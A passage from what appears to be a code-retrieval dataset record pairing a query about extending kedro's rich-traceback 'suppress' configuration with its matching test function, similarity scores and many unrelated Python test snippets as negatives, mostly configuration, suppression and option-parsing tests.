parallel flow now so the results can be provided\n # to any post-execs.\n rets['wrapper_task_rets'] = self._process_subtask_rets(\n tf_eng.run(\n pflow, engine='parallel',\n executor=ContextThreadPoolExecutor(self.max_workers)))\n if self._post_exec:\n flow = tf_lf.Flow('%s_post_execs' % self.name)\n flow.add(*self._post_exec)\n eng = tf_eng.load(flow, store=rets)\n eng.run()\n rets = eng.storage.fetch_all()\n except tf_ex.WrappedFailure as wfail:\n LOG.error(_(\"FeedTask %s experienced multiple exceptions. They \"\n \"are logged individually below.\"), self.name)\n for fail in wfail:\n LOG.exception(fail.pformat(fail.traceback_str))\n raise ex.MultipleExceptionsInFeedTask(self.name, wfail)\n\n # Let a non-wrapped exception (which happens if there's only one\n # element in the feed) bubble up as-is.\n\n return rets", "def run(self, **kwargs):\n for repl in self.replicas:\n self.log.info('-'*50)\n self.log.info(\"Running %s analysis...\"%repl.name)\n self.__submitReplica(repl, **kwargs)\n self.log.info('-'*50)", "def run(self,measurements,actions):\n raise NotImplementedError" ]
[ "0.63525146", "0.5947928", "0.5696838", "0.5634496", "0.5608928", "0.56013626", "0.5599923", "0.5587855", "0.55873567", "0.55794024", "0.5530784", "0.551449", "0.55136603", "0.54978615", "0.5480734", "0.5459616", "0.5439924", "0.5439924", "0.54238594", "0.54176867", "0.5402115", "0.5400623", "0.54001963", "0.5382854", "0.53654504", "0.5365022", "0.5353128", "0.5334745", "0.53345764", "0.5334531", "0.5328001", "0.5325458", "0.531181", "0.5309782", "0.5297234", "0.5280693", "0.52670294", "0.5261316", "0.5226375", "0.5225141", "0.5214236", "0.5201919", "0.5195302", "0.51891285", "0.51810586", "0.51546", "0.51538295", "0.5145682", "0.5143882", "0.5137166", "0.51362777", "0.51362777", "0.51362777", "0.5118521", "0.5117696", "0.51171213", "0.5114591", "0.5111028", "0.5108454", "0.51080686", "0.51007867", "0.5090646", "0.50812227", "0.50798327", "0.50714743", "0.50709766", "0.5070688", "0.50664467", "0.50656885", "0.50637555", "0.5058226", "0.5052036", "0.5048573", "0.5044786", "0.50415546", "0.50366896", "0.50355357", "0.5033161", "0.503115", "0.50226706", "0.5022072", "0.5021281", "0.5020987", "0.5019065", "0.5016951", "0.5014145", "0.5013978", "0.50099474", "0.5007657", "0.50053877", "0.5005315", "0.500085", "0.49952152", "0.49951133", "0.49899662", "0.49889833", "0.49844626", "0.49768695", "0.4973292", "0.49727687" ]
0.54119116
20
Test the configuration is not overrided but extend for `suppress`
def test_rich_traceback_configuration_extend_suppress(mocker, default_logging_config): import click rich_traceback_install = mocker.patch("rich.traceback.install") rich_pretty_install = mocker.patch("rich.pretty.install") sys_executable_path = str(Path(sys.executable).parent) traceback_install_defaults = {"suppress": [click, sys_executable_path]} fake_path = "dummy" rich_handler = { "class": "kedro.logging.RichHandler", "rich_tracebacks": True, "tracebacks_suppress": [fake_path], } test_logging_config = default_logging_config test_logging_config["handlers"]["rich"] = rich_handler LOGGING.configure(test_logging_config) expected_install_defaults = traceback_install_defaults expected_install_defaults["suppress"].extend([fake_path]) rich_traceback_install.assert_called_with(**expected_install_defaults) rich_pretty_install.assert_called_once()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_suppress_import(self):\n logging.info(\"testing suppress import\")\n\n generated_file = os.path.join(self._test_workspace,\n \"generated.suppress\")\n\n extract_cmd = ['CodeChecker', 'parse',\n os.path.join(self._test_workspace, \"reports\"),\n \"--suppress\", generated_file,\n \"--export-source-suppress\"\n ]\n\n ret = call_cmd(extract_cmd,\n self._test_project_path,\n env.test_env(self._test_workspace))\n self.assertEqual(ret, 2, \"Failed to generate suppress file.\")\n\n codechecker_cfg = env.import_test_cfg(\n self._test_workspace)['codechecker_cfg']\n\n product_url = env.parts_to_url(codechecker_cfg)\n import_cmd = ['CodeChecker', 'cmd', 'suppress', '-i', generated_file,\n '--url', product_url, self._run_name]\n\n print(import_cmd)\n ret = call_cmd(import_cmd,\n self._test_project_path,\n env.test_env(self._test_workspace))\n self.assertEqual(ret, 0, \"Failed to import suppress file.\")", "def discard_config(self):\n raise NotImplementedError", "def pytest_ignore_collect(path: Any, config: Config) -> bool:\n if config.option.functional:\n return True\n if config.option.markexpr and \"wip\" in config.option.markexpr:\n return False # collect when looking for markers\n return not (config.option.integration or config.option.integration_only)", "def _suppress(self, key):\n return key in self.SUPPRESS", "def test_single_git_override_disabled_deprecations(self):\n for prefix in ['', 'git-']:\n os.environ['GBP_DISABLE_SECTION_DEPRECTATION'] = 'true'\n parser = GbpOptionParser('%scmd2' % prefix)\n self.assertEqual(parser.config['single_git_override_option1'], 'single_git_override_value1')\n for line in range(0, 2):\n self._check_log_empty()\n os.environ.pop('GBP_DISABLE_SECTION_DEPRECTATION')", "def test_disable_retainUnsent():\n config_info = read_config()\n config_info['retainUnsent'] = False\n open(config_file, 'w').close()\n with open(config_file, 'r+') as conf:\n conf.write(json.dumps(config_info))\n config_info = read_config()\n\n assert config_info['retainUnsent'] is False", "def test_exclude_include_overlapping_ambiguous_and_includes_excluded_init_overridden_file_line():\n\n class iitem(ConfigItem):\n def __init__(self, mc_include, mc_exclude):\n super().__init__(mc_include=mc_include, mc_exclude=mc_exclude)\n\n with raises(ConfigException) as exinfo:\n class X():\n def __init__(self):\n iitem(mc_exclude=[dev2], mc_include=[dev2, prod])\n\n @mc_config(ef, load_now=True)\n def config(rt):\n with root(aa=1):\n X()\n\n exp = \"Env('dev2') is specified in both include and exclude, with no single most specific group or direct env:\"\n assert exp in str(exinfo.value)", "def default_confoverrides(cls, config):\n return _apply_confoverride_to_class(cls, config, 1)", "def is_ignored(self):", "def override_configuration():\n\n bool_config_override(\"BUILDTEST_MODULE_FORCE_PURGE\")\n\n if os.environ.get(\"BUILDTEST_SPIDER_VIEW\"):\n config_opts[\"BUILDTEST_SPIDER_VIEW\"] = os.environ[\"BUILDTEST_SPIDER_VIEW\"]\n\n if os.environ.get(\"BUILDTEST_SUCCESS_THRESHOLD\"):\n threshold = float(os.environ.get(\"BUILDTEST_SUCCESS_THRESHOLD\"))\n\n if threshold >= 0.0 and threshold <= 1.0:\n config_opts[\"BUILDTEST_SUCCESS_THRESHOLD\"] = threshold", "def test_enable_retainUnsent():\n config_info = read_config()\n config_info['retainUnsent'] = True\n open(config_file, 'w').close()\n with open(config_file, 'r+') as conf:\n conf.write(json.dumps(config_info))\n config_info = read_config()\n\n assert config_info['retainUnsent'] is True", "def exclude_opts(cls) -> Tuple[str, ...]:\n return \"required\", \"print_config\", \"config\", \"ngpu\"", "def suppress(self):\n pass", "def test_defaults():\n config = Config(\n env_var='DO_NOT_USE',\n env_prefix='DO_NOT_USE',\n entry_point_name='DO_NOT_USE',\n )\n\n assert not config.keys()", "def test_configure_without_inheritance(self):\n\n @Configurable(conf=category('TEST', Parameter('test', value=True)))\n class BaseTest(object):\n \"\"\"base Class to configure.\"\"\"\n\n class Test(BaseTest):\n \"\"\"Class to configure.\"\"\"\n\n targets = Test()\n\n self.assertTrue(targets.test)", "def check_configuration(self, configuration):\n super(Pixiv_bot, self).check_configuration(configuration)", "def _check_config(self):", "def check_configuration(self, configuration):\n super(Hipchap, self).check_configuration(configuration)", "def _suppress_warnings():\n import warnings\n import sys\n import os\n if os.path.basename(sys.argv[0]) != \"trial\":\n warnings.simplefilter(\"ignore\")", "def pytest_configure(config):\n disabled = ['gensim.models.word2vec', 'faker.factory']\n for name in disabled:\n logger = logging.getLogger(name)\n logger.propagate = False", "async def test_skipped_already_silenced(self):\n subtests = (\n (\n False,\n MockTextChannel(),\n PermissionOverwrite(\n send_messages=False,\n add_reactions=False,\n create_private_threads=False,\n create_public_threads=False,\n send_messages_in_threads=False\n )\n ),\n (\n True,\n MockTextChannel(),\n PermissionOverwrite(\n send_messages=True,\n add_reactions=True,\n create_private_threads=True,\n create_public_threads=True,\n send_messages_in_threads=True\n )\n ),\n (\n True,\n MockTextChannel(),\n PermissionOverwrite(\n send_messages=False,\n add_reactions=False,\n create_private_threads=False,\n create_public_threads=False,\n send_messages_in_threads=False\n )\n ),\n (False, MockVoiceChannel(), PermissionOverwrite(connect=False, speak=False)),\n (True, MockVoiceChannel(), PermissionOverwrite(connect=True, speak=True)),\n (True, MockVoiceChannel(), PermissionOverwrite(connect=False, speak=False)),\n )\n\n for contains, channel, overwrite in subtests:\n with self.subTest(contains=contains, is_text=isinstance(channel, MockTextChannel), overwrite=overwrite):\n self.cog.scheduler.__contains__.return_value = contains\n channel.overwrites_for.return_value = overwrite\n\n self.assertFalse(await self.cog._set_silence_overwrites(channel))\n channel.set_permissions.assert_not_called()", "def setup_class(self):\n\n global TEST_WORKSPACE\n TEST_WORKSPACE = env.get_workspace('suppress')\n\n os.environ['TEST_WORKSPACE'] = TEST_WORKSPACE\n\n test_project = 'suppress'\n\n test_config = {}\n\n project_info = project.get_info(test_project)\n\n test_proj_path = os.path.join(TEST_WORKSPACE, \"test_proj\")\n shutil.copytree(project.path(test_project), test_proj_path)\n\n project_info['project_path'] = test_proj_path\n\n test_config['test_project'] = project_info\n\n # Generate a suppress file for the tests.\n suppress_file = os.path.join(TEST_WORKSPACE, 'suppress_file')\n if os.path.isfile(suppress_file):\n os.remove(suppress_file)\n _generate_suppress_file(suppress_file)\n\n test_env = env.test_env(TEST_WORKSPACE)\n\n codechecker_cfg = {\n 'suppress_file': None,\n 'skip_list_file': None,\n 'check_env': test_env,\n 'workspace': TEST_WORKSPACE,\n 'checkers': [],\n 'analyzers': ['clangsa', 'clang-tidy']\n }\n\n ret = project.clean(test_project, test_env)\n if ret:\n sys.exit(ret)\n\n # Start or connect to the running CodeChecker server and get connection\n # details.\n print(\"This test uses a CodeChecker server... connecting...\")\n server_access = codechecker.start_or_get_server()\n server_access['viewer_product'] = 'suppress'\n codechecker.add_test_package_product(server_access, TEST_WORKSPACE)\n\n # Extend the checker configuration with the server access.\n codechecker_cfg.update(server_access)\n\n test_project_name = project_info['name'] + '_' + uuid.uuid4().hex\n\n ret = codechecker.check_and_store(codechecker_cfg,\n test_project_name,\n project.path(test_project))\n\n if ret:\n sys.exit(1)\n print(\"Analyzing the test project was successful.\")\n test_project_name_dup = test_project_name + \"_duplicate\"\n ret = codechecker.store(codechecker_cfg, test_project_name_dup)\n\n codechecker_cfg['run_names'] = [test_project_name,\n test_project_name_dup]\n test_config['codechecker_cfg'] = codechecker_cfg\n\n env.export_test_cfg(TEST_WORKSPACE, test_config)", "def check_config(config):\n pass", "def exclude(self, *args, **kwargs):", "def test_single_override(self):\n for prefix in ['', 'git-', 'gbp-']:\n parser = GbpOptionParser('%scmd1' % prefix)\n self.assertEqual(parser.config['single_override_option1'], 'single_override_value1')\n # No deprecation warning since the test1.conf section is [cmd1]\n self._check_log_empty()", "def _suppressions(self) -> List:\n sonar, sonar_id = self._metric_source, self._sonar_id()\n return [\n (sonar.false_positives(sonar_id), sonar.false_positives_url(sonar_id),\n \"Gemarkeerd als false positive in SonarQube\"),\n (sonar.wont_fix(sonar_id), sonar.wont_fix_url(sonar_id),\n \"Gemarkeerd als won't fix in SonarQube\"),\n (sonar.suppressions(sonar_id), sonar.suppressions_url(sonar_id),\n \"Gemarkeerd in de broncode met annotatie, commentaar (bijv. //NOSONAR) of pragma\")]", "def test_excess_settings(monkeypatch) -> None: # noqa: TYP001\n monkeypatch.setattr(django_settings, 'SWAGGER_TESTER', {'bad_setting': 5})\n with pytest.raises(ImproperlyConfigured, match='is not a valid setting for the django-swagger-tester module'):\n SwaggerTesterSettings()", "def ignore_non_actual_section(): # noqa: D416", "def test_check_exclude_none(self):\n\n self.assertTrue(PostfixExclude([]).check(self.file_gitignore))\n self.assertTrue(PostfixExclude([]).check(self.file_py))\n self.assertTrue(PostfixExclude([]).check(self.file_authors))\n self.assertTrue(PostfixExclude([]).check(self.file__init__))\n self.assertTrue(PostfixExclude([]).check(self.file_bin))", "def test_skip_with_decorator_and_reason():\n pass", "def settings():\n raise NotImplementedError # pragma: nocoverage", "def test_config_no_biopython(monkeypatch):\n monkeypatch.setattr(core, 'HAVE_BIOPYTHON', False)\n assert core.HAVE_BIOPYTHON is False\n args = Namespace(extended_validation='all')\n with pytest.raises(ValueError):\n core.Config.from_args(args)", "def test_config_merging_missing():\n toml = StringIO(\n dedent(\n \"\"\"\\\n [tool.vulture]\n verbose = true\n ignore_names = [\"name1\"]\n \"\"\"\n )\n )\n cliargs = [\n \"cli_path\",\n ]\n result = make_config(cliargs, toml)\n assert result[\"verbose\"] is True\n assert result[\"ignore_names\"] == [\"name1\"]", "def checkConf(settings, stanza=None, confInfo=None, throwExceptionOnError=False): \n # Below is a list of the required fields. The entries in this list will be removed as they\n # are observed. An empty list at the end of the config check indicates that all necessary\n # fields where provided.\n required_fields = Suppressions.REQUIRED_PARAMS[:]\n \n if stanza is not None and confInfo is not None:\n # Add each of the settings\n for key, val in settings.items():\n # Set val to empty if None\n if val is None:\n val = ''\n \n if key in Suppressions.VALID_PARAMS:\n confInfo[stanza].append(key, val)\n \n # Key is eai; Set meta \n elif key.startswith(admin.EAI_ENTRY_ACL):\n confInfo[stanza].setMetadata(key, val)\n \n # Key is eai; userName/appName\n elif key.startswith(admin.EAI_META_PREFIX):\n confInfo[stanza].append(key, val)\n \n # Key is not proper\n else:\n pass\n \n # Check each of the settings individually\n logger.info(\"Checking general settings for the '%s' suppression\", stanza)\n for key, val in settings.items():\n # Set val to empty if None\n if val is None:\n val = ''\n \n # Check the disabled/selected value\n if key == Suppressions.PARAM_DISABLED:\n try:\n util.normalizeBoolean(val, enableStrictMode=True)\n \n # Remove the field from the list of required fields\n try:\n required_fields.remove(key)\n \n except ValueError:\n pass # Field not available, probably because it is not required\n \n except ValueError:\n raise InvalidParameterValueException(key, val, \"must be a valid boolean\")\n \n elif key in Suppressions.REQUIRED_PARAMS:\n # Remove the field from the list of required fields\n try:\n required_fields.remove(key)\n \n except ValueError:\n pass # Field not available, probably because it is not required\n \n elif key in Suppressions.VALID_PARAMS:\n pass\n \n # Key is eai\n elif key.startswith(admin.EAI_META_PREFIX):\n pass\n \n # Key is not proper\n else:\n if throwExceptionOnError:\n raise UnsupportedParameterException()\n \n else:\n logger.warn(\"The configuration for '%s' contains an unsupported parameter: %s\", stanza, key)\n\n # Error if some of the required fields were not provided\n if len(required_fields) > 0:\n raise InvalidConfigException('The following fields must be defined in the configuration but were not: ' + ', '.join(required_fields).strip())", "def confoverrides(**config):\n def actual_decorator(meth_or_cls):\n if not config:\n return meth_or_cls\n\n if isclass(meth_or_cls):\n return _apply_confoverride_to_class(meth_or_cls, config, 2)\n else:\n return pytest.mark.exhale(3, confoverrides=config)(meth_or_cls)\n\n return actual_decorator", "def suppressWarningClass(clazz):\n _enabled.insert(0, (clazz, 0))", "def suppress_error(self):\n return self._suppress_error", "def pytest_unconfigure(config):\n if config.option.intercept_remote:\n global mpatch\n mpatch.undo()\n intercept_dump(config)", "def suppress_exceptions(cls, value=True):\n cls._suppress_exceptions = value", "def test_exclude_include_overlapping_for_configitem_with_overridden_mc_select_envs(capsys):\n errorline = [None]\n\n with raises(ConfigException) as exinfo:\n # No most specific\n @mc_config(ef, load_now=True)\n def config(rt):\n with ItemWithAA():\n with McSelectOverrideItem() as it:\n errorline[0] = next_line_num()\n it.mc_select_envs(exclude=[dev1], include=[dev1, pp])\n\n assert \"There was 1 error when defining item\" in str(exinfo.value)\n _sout, serr = capsys.readouterr()\n print(serr)\n\n ce(errorline[0], serr, exp_dev1_ambiguous)\n\n with raises(ConfigException) as exinfo:\n # No most specific\n @mc_config(ef, load_now=True)\n def config(rt):\n with ItemWithAA():\n with McSelectOverrideItem2() as it:\n errorline[0] = next_line_num()\n it.mc_select_envs(exclude=[dev1], include=[dev1, pp])\n\n assert \"There was 1 error when defining item\" in str(exinfo.value)\n _sout, serr = capsys.readouterr()\n print(serr)\n\n ce(errorline[0], serr, exp_dev1_ambiguous)", "def clear_parameter_run_config_collisions(self) -> None:\n if not self.override_config:\n return\n keys = [key for key in self.override_config.keys()]\n for key in keys:\n if self.override_args.get(key):\n del self.override_config[key]", "def test_exclude_include_overlapping_ambiguous_single_env_init(capsys):\n errorline = [None]\n\n with raises(ConfigException) as exinfo:\n # No most specific\n @mc_config(ef, load_now=True)\n def config(rt):\n with ItemWithAA(aa=0):\n errorline[0] = next_line_num()\n item(mc_exclude=[dev1], mc_include=[dev1, pp])\n\n sout, _serr = capsys.readouterr()\n assert sout == \"\"\n\n assert exp_dev1_ambiguous in str(exinfo.value)\n\n with raises(ConfigException) as exinfo:\n # No most specific\n @mc_config(ef, load_now=True)\n def config(rt):\n with ItemWithAA(aa=0):\n errorline[0] = next_line_num()\n item(mc_exclude=[pp, dev1], mc_include=[dev1])\n\n assert exp_dev1_ambiguous in str(exinfo.value)", "def test_bug_2247(self):\n\n code, out, err = self.t(\"rc.color:0 add test\")\n self.assertIn(\"Configuration override\", err)\n\n # Once rc.verbose:nothing is set, no output about configuration overrides should appear\n code, out, err = self.t(\"rc.verbose:nothing add test\")\n self.assertNotIn(\"Configuration override\", err)\n\n code, out, err = self.t(\"rc.color:0 rc.verbose:nothing add test\")\n self.assertNotIn(\"Configuration override\", err)\n\n code, out, err = self.t(\"rc.verbose:nothing rc.color:0 add test\")\n self.assertNotIn(\"Configuration override\", err)", "def test_no_adapter_opts(self):\n self.oslo_config_dict['heat'] = None\n self.assert_service_disabled(\n 'orchestration',\n \"Encountered an exception attempting to process config for \"\n \"project 'heat' (service type 'orchestration'): no such option\",\n )", "def test_invalid_adapter_opts(self):\n self.oslo_config_dict['heat'] = {\n 'interface': 'public',\n 'valid_interfaces': 'private',\n }\n self.assert_service_disabled(\n 'orchestration',\n \"Encountered an exception attempting to process config for \"\n \"project 'heat' (service type 'orchestration'): interface and \"\n \"valid_interfaces are mutually exclusive.\",\n )", "def excluded(self):\n\n # A few variables for convenience of writing the method\n spec = self.spec\n conf = self.module.configuration(self.name)\n\n # Compute the list of include rules that match\n # DEPRECATED: remove 'whitelist' in v0.20\n include_rules = get_deprecated(conf, \"include\", \"whitelist\", [])\n include_matches = [x for x in include_rules if spec.satisfies(x)]\n\n # Compute the list of exclude rules that match\n # DEPRECATED: remove 'blacklist' in v0.20\n exclude_rules = get_deprecated(conf, \"exclude\", \"blacklist\", [])\n exclude_matches = [x for x in exclude_rules if spec.satisfies(x)]\n\n # Should I exclude the module because it's implicit?\n # DEPRECATED: remove 'blacklist_implicits' in v0.20\n exclude_implicits = get_deprecated(conf, \"exclude_implicits\", \"blacklist_implicits\", None)\n installed_implicitly = not spec._installed_explicitly()\n excluded_as_implicit = exclude_implicits and installed_implicitly\n\n def debug_info(line_header, match_list):\n if match_list:\n msg = \"\\t{0} : {1}\".format(line_header, spec.cshort_spec)\n tty.debug(msg)\n for rule in match_list:\n tty.debug(\"\\t\\tmatches rule: {0}\".format(rule))\n\n debug_info(\"INCLUDE\", include_matches)\n debug_info(\"EXCLUDE\", exclude_matches)\n\n if excluded_as_implicit:\n msg = \"\\tEXCLUDED_AS_IMPLICIT : {0}\".format(spec.cshort_spec)\n tty.debug(msg)\n\n is_excluded = exclude_matches or excluded_as_implicit\n if not include_matches and is_excluded:\n return True\n\n return False", "def test_exclude_include_overlapping_ambiguous_and_includes_excluded_init(capsys):\n\n errorline = [None]\n exp = \"Env('dev2') is specified in both include and exclude, with no single most specific group or direct env:\"\n\n with raises(ConfigException) as exinfo:\n @mc_config(ef, load_now=True)\n def config(rt):\n with root(aa=1):\n with ritem('a', mc_exclude=[prod]) as ri:\n ri.anattr = 1\n ri.anotherattr = 2\n errorline[0] = next_line_num()\n item(mc_exclude=[dev2], mc_include=[dev2, prod])\n\n sout, _serr = capsys.readouterr()\n assert sout == \"\"\n\n assert exp in str(exinfo.value)", "def suppress(self):\n return Suppress(self)", "def test_exclude_include_overlapping_for_configitem(capsys):\n\n @mc_config(ef, load_now=True)\n def config(rt):\n with ItemWithAA() as cr:\n cr.aa = 1\n with item(mc_include=[g_dev12_3, pp], mc_exclude=[g_dev12]) as it:\n it.setattr('anattr', pp=1, g_dev12_3=2)\n it.setattr('b', pp=1, dev3=0)\n it.setattr('anotherattr', default=111)\n return cr\n\n cr = config(prod).ItemWithAA\n assert cr.aa == 1\n assert not cr.item\n assert compare_json(cr, _include_exclude_for_configitem_expected_json, test_excluded=True)\n\n cr = config(dev1).ItemWithAA\n assert cr.aa == 1\n assert not cr.item\n\n cr = config(dev2).ItemWithAA\n assert cr.aa == 1\n assert not cr.item\n\n cr = config(dev3).ItemWithAA\n assert cr.aa == 1\n assert cr.item\n assert cr.item.anattr == 2\n assert cr.item.b == 0\n assert cr.item.anotherattr == 111\n\n cr = config(pp).ItemWithAA\n assert cr.aa == 1\n assert cr.item\n assert cr.item.anattr == 1\n assert cr.item.b == 1\n assert cr.item.anotherattr == 111", "def cmdline_args_override(\n config: Config, args: Namespace, ignore: Optional[Union[str, List[str]]] = None\n) -> None:\n if isinstance(ignore, str):\n ignore = [ignore]\n else:\n ignore = ignore or []\n\n for key, value in vars(args).items():\n if key not in ignore and value is not None:\n config.__setitem__(key, value)", "def test_skipif_false():\n pass", "def suppress(self, t, w=None):\n return super(SmartCentroidPublisher, self).suppress(t, w)", "def test_exclude_ip_ban(self):\n pass", "def test_required_config(self, ckan_config, monkeypatch, option):\n monkeypatch.delitem(ckan_config, option)\n plugin = p.get_plugin(\"cloudstorage\")\n with pytest.raises(RuntimeError, match=\"configuration option\"):\n plugin.configure(ckan_config)", "def ignore_all(self):\n # type: () -> bool\n return False", "def test_airflow_config_output_does_not_contain_providers_when_excluded(self):\n CONFIG_FILE.parent.mkdir(parents=True, exist_ok=True)\n CONFIG_FILE.unlink(missing_ok=True)\n CONFIG_FILE.touch(exist_ok=True)\n result = subprocess.run(\n [sys.executable, \"-m\", \"airflow\", \"config\", \"list\", \"--exclude-providers\"],\n env={\"PYTHONPATH\": os.pathsep.join(sys.path)},\n check=False,\n text=True,\n capture_output=True,\n )\n assert result.returncode == 0\n assert \"celery_config_options\" not in result.stdout", "def test_exclude_include_overlapping_resolved_with_exclude_for_configitem():\n\n @mc_config(ef, load_now=True)\n def config(rt):\n with ItemWithAA() as cr:\n cr.aa = 1\n with item(mc_include=[g_dev12, pp], mc_exclude=[dev2, g_dev23]) as it:\n it.setattr('anattr', pp=1, g_dev12_3=2)\n it.setattr('b', pp=1)\n it.setattr('anotherattr', default=111)\n return cr\n\n cr = config(prod).ItemWithAA\n assert not cr.item\n assert compare_json(cr, _include_exclude_for_configitem_expected_json, test_excluded=True)\n\n cr = config(dev1).ItemWithAA\n assert cr.item\n\n cr = config(dev2).ItemWithAA\n assert not cr.item\n\n cr = config(dev3).ItemWithAA\n assert not cr.item\n\n cr = config(pp).ItemWithAA\n assert cr.item\n assert cr.item.anattr == 1\n assert cr.item.b == 1\n assert cr.item.anotherattr == 111", "def test_checkCustoms(self):\n self.failUnlessEqual(self.nice.opts['myflag'], \"PONY!\")\n self.failUnlessEqual(self.nice.opts['myparam'], \"Tofu WITH A PONY!\")", "def test_cli_exclude_use_cfg(cleanup_test_path_multiples,\n generate_options_exclude,\n flag_tag,\n flag_exclude,\n flag_config):\n config_path = generate_options_exclude[0]\n src_path = generate_options_exclude[1]\n target_path = generate_options_exclude[2]\n tags = generate_options_exclude[3:]\n working_path = os.path.commonpath([src_path, target_path])\n exclude = os.path.basename(target_path)\n\n # read in original files first\n og_contents = read_python_files_as_dict(src_path)\n\n # run with exclude options from the command line first\n cmd = [\"pytag\", working_path, flag_exclude, exclude, flag_tag, *tags]\n subprocess.run(cmd, check=True)\n expected_contents = read_python_files_as_dict(src_path)\n\n # restore the files for a second run\n write_file_from_dict(og_contents)\n\n # run with exclude options from config file\n cmd = [\"pytag\", flag_config, config_path]\n subprocess.run(cmd, check=True)\n actual_contents = read_python_files_as_dict(src_path)\n\n for name in actual_contents:\n actual = actual_contents[name]\n expected = expected_contents[name]\n assert actual == expected", "def run_side_effects(self, label, *args, **kwargs):\n if self._suppress or settings.TEST_MODE:\n self.suppressed_side_effect.send(Registry, label=label)\n else:\n self._run_side_effects(label, *args, **kwargs)", "def test_skipif_true():\n pass", "def test_no_config_keyword(self):\n args = self.get_args()\n config = {\n \"site\": {\n \"username\": \"\",\n \"name\": \"\",\n \"ip_address\": \"\",\n \"password\": \"\",\n \"local\": \"\",\n \"use_https\": \"\"\n }\n }\n temp = sys.stdout\n fake_out = FakeStdio()\n sys.stdout = fake_out\n\n config_filename = 'testsuite_cfg.json'\n args.config = config_filename\n config_file = open(config_filename, 'w')\n config_file.write(str(json.dumps(config)))\n config_file.close()\n\n execute_tool(args, test_mode=True)\n sys.stdout = temp\n self.assertTrue(fake_out.verify_output(['%% Invalid configuration file', '\\n']))", "def suppress_analyze(more_exclusions=None):\n return api.override_step_data(\n 'read filter exclusion spec',\n api.json.output({\n 'base': {\n 'exclusions': ['f.*'] + (more_exclusions or []),\n },\n 'chromium': {\n 'exclusions': [],\n },\n })\n )", "def no_additional_complaints() -> None:\n logging.getLogger(\"asyncio\").setLevel(\"CRITICAL\")\n warnings.simplefilter(\"ignore\")", "def check_config(cfg):", "def test_using_ini_config(checker, capsys):\n phmdoctest.main.generate_using(config_file=Path(\"tests/generate_quietly.ini\"))\n assert len(capsys.readouterr().out) == 0", "def _canDisable(func):\n def wrapper(*args, **kwargs):\n if _DISABLE_ASSERTIONS == 0:\n return func(*args, **kwargs)\n return wrapper", "def test_if_no_elimination():\n\n def f(x):\n if x:\n a = 1\n else:\n a = 2\n\n check_component(prune_cfg, f, dict(y=2))", "def test_check(self):\n\n self.assertTrue(PostfixExclude().check(self.file_gitignore))\n self.assertTrue(PostfixExclude().check(self.file_py))\n self.assertTrue(PostfixExclude().check(self.file_authors))\n self.assertTrue(PostfixExclude().check(self.file__init__))\n self.assertTrue(PostfixExclude().check(self.file_bin))", "def test_deprecated_logger_without_config_attributes(\n caplog: pytest.LogCaptureFixture,\n) -> None:\n file: str = \"configuration.yaml\"\n line: int = 54\n replacement = f\"'mars' option near {file}:{line} is deprecated\"\n config = OrderedDict([(\"mars\", \"blah\")])\n\n cv.deprecated(\"mars\", replacement_key=\"jupiter\", default=False)(config)\n\n assert len(caplog.records) == 1\n assert replacement not in caplog.text\n assert (\n \"The 'mars' option is deprecated, please replace it with 'jupiter'\"\n ) in caplog.text\n\n caplog.clear()\n assert len(caplog.records) == 0", "def __init__(self, *args, **kwargs):\n # skip\n self.skip_whitelist = set(kwargs.pop('skip_whitelist', []))\n self.skip_blacklist = set(kwargs.pop('skip_blacklist', []))\n # ignore\n self.ignore_whitelist = set(kwargs.pop('ignore_whitelist', []))\n self.ignore_blacklist = set(kwargs.pop('ignore_blacklist', []))\n\n\n super(MyTestRunner, self).__init__(*args, **kwargs)", "def test_set_defaults(self):\r\n self.assertEqual(self.config.values['option1'], 1337)\r\n self.assertNotIn('option2', self.config.values)", "def configure_misc(conf):\n if conf.get('gitignore', None) is None:\n conf['gitignore'] = yes_no(\n 'Would you like items from children gitignores to be excluded from the sync?', default=False)\n if conf['host'] == 'Client' and conf.get('sleep_time', None) is None:\n prompt = 'How long, in seconds, would you like the client to sleep before re-syncing? Enter -1 for single use.'\n conf['sleep_time'] = numeric_response(prompt, default=-1)\n return conf", "def configure(self):\n warnings.warn(\"No options to configure for \" + self.__class__.__name__)", "def mock_config(monkeypatch: Any) -> None:\n monkeypatch.setattr(\"catapi.config.ENABLE_FOO\", \"true\")\n monkeypatch.setattr(\"catapi.config.ENABLE_BAR\", \"false\")", "def nonverbose_config(config) -> Generator[None, None, None]:\n if config.option.verbose <= 0:\n yield\n else:\n saved = config.option.verbose\n config.option.verbose = 0\n yield\n config.option.verbose = saved", "def test_cancel_config(self):\n browser = Browser(self.app)\n portalURL = self.portal.absolute_url()\n browser.addHeader('Authorization', 'Basic %s:%s' % (SITE_OWNER_NAME, SITE_OWNER_PASSWORD))\n browser.open(portalURL + '/@@overview-controlpanel')\n browser.getLink('Image WatchDog settings').click()\n browser.getControl('Optimize PNG').selected = True\n browser.getControl('Enabled').selected = True\n browser.getControl('Cancel').click()\n\n registry = getUtility(IRegistry)\n settings = registry.forInterface(IImageWatchDogSettings)\n self.assertFalse(settings.optimize)\n self.assertFalse(settings.enabled)", "def initialize_options(self):\n self.all = False\n self.coverage = False\n super(test, self).initialize_options()", "def test_no_double_configuration(self):\n class A(pyperry.Base):\n def _config(cls):\n cls.add_processor('read', 'some processor')\n self.assertEqual(len(A.adapter_config['read']['_processors']), 1)\n\n class B(A): pass\n self.assertEqual(len(B.adapter_config['read']['_processors']), 1)", "async def test_skipped_already_unsilenced(self):\n self.cog.scheduler.__contains__.return_value = False\n self.cog.previous_overwrites.get.return_value = None\n\n for channel in (MockVoiceChannel(), MockTextChannel()):\n with self.subTest(channel=channel):\n self.assertFalse(await self.cog._unsilence(channel))\n channel.set_permissions.assert_not_called()", "def separately_configurable(self):\n return False", "def separately_configurable(self):\n return False", "def check_for_deprecated_config(config):\n\n # key is the name of the depreacted variable that is no longer allowed in any config files\n # value is a dictionary containing information about what to do with the deprecated config\n # 'sec' is the section of the config file where the replacement resides, i.e. config, dir,\n # filename_templates\n # 'alt' is the alternative name for the deprecated config. this can be a single variable name or\n # text to describe multiple variables or how to handle it. Set to None to tell the user to\n # just remove the variable\n # 'copy' is an optional item (defaults to True). set this to False if one cannot simply replace\n # the deprecated config variable name with the value in 'alt'\n # 'req' is an optional item (defaults to True). this to False to report a warning for the\n # deprecated config and allow execution to continue. this is generally no longer used\n # because we are requiring users to update the config files. if used, the developer must\n # modify the code to handle both variables accordingly\n deprecated_dict = {\n 'LOOP_BY_INIT' : {'sec' : 'config', 'alt' : 'LOOP_BY', 'copy': False},\n 'LOOP_METHOD' : 